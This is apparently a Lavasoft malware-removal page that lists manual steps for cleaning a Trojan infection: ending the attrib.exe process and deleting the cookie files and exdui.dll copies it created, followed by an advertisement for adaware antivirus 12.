  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    attrib.exe:1888

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (791 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@baidu[1].txt (725 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    C:\exdui.dll (42 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (162 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@baidu[2].txt (391 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (678 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (234 bytes)
    %WinDir%\system\exdui.dll (42 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (11952 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][2].txt (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\now_set[1].htm (2413 bytes)
    %Documents and Settings%\%current user%\Cookies\[email protected][1].txt (207 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (309 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now